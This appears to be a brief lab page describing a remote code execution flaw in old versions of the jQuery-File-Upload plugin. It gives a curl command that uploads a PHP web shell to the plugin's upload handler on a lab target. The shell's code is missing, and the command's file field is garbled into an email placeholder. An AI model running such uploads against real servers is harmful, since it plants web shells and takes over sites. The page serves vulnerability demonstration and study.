jQuery-File-Upload < v9.22.1 Remote Code Execution Vulnerability

jQuery-File-Upload is the second most starred jQuery project on GitHub, after the jQuery framework itself. For at least three years, hackers have abused a zero-day in one of the most popular jQuery plugins to plant web shells and take over vulnerable web servers.


File shell.php:


Upload shell.php:

curl -F "[email protected]" http://target.vsplate.me/server/php/index.php


All rights reserved. © 2022 VULNSPY